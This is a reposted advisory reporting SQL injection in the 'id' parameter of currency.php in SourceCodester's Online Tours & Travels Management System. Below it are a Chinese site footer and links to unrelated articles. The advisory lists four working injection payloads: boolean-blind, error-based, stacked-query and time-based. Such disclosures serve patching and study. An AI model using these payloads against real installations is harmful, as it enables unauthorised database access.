SourceCodester Online Tours 和amp; Travels Management System currency.php sql injection
SourceCodester Online Tours & Travels Management System currency.php sql injection
Url: admin/operations/currency.php
Abstract:
Line 44 of currency.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands.
Explanation:
SQL injection errors occur when:
-
Data enters a program from an untrusted source.
-
The data is used to dynamically construct a SQL query.
In this case, the data is passed to exec() in currency.php on line 44.
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: id=111' AND 9192=(SELECT (CASE WHEN (9192=9192) THEN 9192 ELSE (SELECT 7773 UNION SELECT 6688) END))-- -
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: id=111' AND GTID_SUBSET(CONCAT(0x7171767671,(SELECT (ELT(7846=7846,1))),0x71767a7671),7846)-- FmDU
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: id=111';SELECT SLEEP(5)#
Type: time-based blind
Title: MySQL < 5.0.12 AND time-based blind (BENCHMARK)
Payload: id=111' AND 8032=BENCHMARK(5000000,MD5(0x54465361))-- fyPR
Download Code:
https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html
这篇好文章是转载于:学新通技术网
- 版权申明: 本站部分内容来自互联网,仅供学习及演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,请提供相关证据及您的身份证明,我们将在收到邮件后48小时内删除。
- 本站站名: 学新通技术网
- 本文地址: /boutique/detail/tanhgfbkcb
系列文章
更多
同类精品
更多
-
photoshop保存的图片太大微信发不了怎么办
PHP中文网 06-15 -
Android 11 保存文件到外部存储,并分享文件
Luke 10-12 -
word里面弄一个表格后上面的标题会跑到下面怎么办
PHP中文网 06-20 -
《学习通》视频自动暂停处理方法
HelloWorld317 07-05 -
photoshop扩展功能面板显示灰色怎么办
PHP中文网 06-14 -
微信公众号没有声音提示怎么办
PHP中文网 03-31 -
excel下划线不显示怎么办
PHP中文网 06-23 -
excel打印预览压线压字怎么办
PHP中文网 06-22 -
怎样阻止微信小程序自动打开
PHP中文网 06-13 -
TikTok加速器哪个好免费的TK加速器推荐
TK小达人 10-01